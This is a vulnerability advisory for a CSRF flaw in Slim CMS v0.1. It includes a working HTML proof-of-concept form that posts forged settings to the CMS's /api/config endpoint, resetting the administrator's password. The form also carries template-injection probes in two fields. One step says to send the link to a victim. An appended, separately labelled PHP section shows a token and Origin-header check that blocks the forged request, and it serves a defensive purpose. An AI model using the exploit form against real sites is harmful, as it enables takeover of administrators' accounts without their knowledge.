<!--
# Exploit Title: CSRF Vulnerability on Slim CMS v0.1
# CMS Link: https://github.com/revuls/SlimCMS/releases
# Date: 16th June'2016
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://www.slimcms.nl/
# Software Link: https://github.com/revuls/SlimCMS/releases
# Version: Slim CMSv0.1
# Tested on: Windows 10, XAMPP
# Twitter: https://twitter.com/m_avinash143

CSRF: Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.

Vulnerability Description:
It is possible to change the administrator's password, and the complete account can be taken over this way.

Steps to Reproduce:
1. Log in to the account.
2. Navigate to http://localhost/SlimCMS/admin/config
3. Fill in the details and intercept the request using BurpSuite

Request Intercepted
--------------------->
<html>
  <body>
    <form action="http://localhost/SlimCMS/api/config" method="POST">
      <input type="hidden" name="title" value="{{7*7}}"/>
      <input type="hidden" name="description" value="{{7*7}}"/>
      <input type="hidden" name="user" value="admin"/>
      <input type="hidden" name="password" value="password"/>
      <input type="hidden" name="theme" value="default"/>
      <input type="hidden" name="url" value="http://localhost/SlimCMS"/>
      <input type="submit" value="Submit request"/>
    </form>
  </body>
</html>
<!--
4. Send the link to the victim; the password will be changed for the admin user once the victim clicks on the URL.
-->
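<!--
Added example, not part of the original advisory and not SlimCMS code: a server-side check that would reject the forged POST shown above by requiring a per-session token and a same-site Origin header. The function names, the csrf_token field and the sample values are assumptions for illustration; PHP 7 or later is assumed.

```php
<?php
// Added example, not SlimCMS code: CSRF guard for a state-changing POST handler.
// Function names and the 'csrf_token' field are hypothetical.

// Issue one random token per session and reuse it until the session ends.
function csrf_issue_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Allow the request only if the Origin header (when sent) matches this site
// and the submitted token equals the token stored in the session.
function csrf_request_allowed(array $session, array $post, array $server, string $siteOrigin): bool {
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $siteOrigin) {
        return false;                       // form posted from another origin
    }
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if (!is_string($given) || $expected === '' || $given === '') {
        return false;                       // no token issued, or none submitted
    }
    return hash_equals($expected, $given);  // constant-time comparison
}

// Constructed sample data: the six fields are the ones in the intercepted request.
$session = [];
$token   = csrf_issue_token($session);      // rendered as a hidden field in the admin form
$fields  = ['title' => 'My site', 'description' => 'Demo', 'user' => 'admin',
            'password' => 'password', 'theme' => 'default',
            'url' => 'http://localhost/SlimCMS'];
$site    = 'http://localhost';

// 1. Forged cross-site post: valid fields, foreign Origin, no token.
$forged = csrf_request_allowed($session, $fields, ['HTTP_ORIGIN' => 'http://other.example'], $site);
// 2. Same fields with no Origin header and no token.
$noToken = csrf_request_allowed($session, $fields, [], $site);
// 3. Genuine admin form post: same origin and carrying the session token.
$genuine = csrf_request_allowed($session, $fields + ['csrf_token' => $token],
                                ['HTTP_ORIGIN' => $site], $site);

var_dump($forged, $noToken, $genuine);
```

In an application the session array would be $_SESSION, and the check would run before the handler for POST /api/config writes any setting.
-->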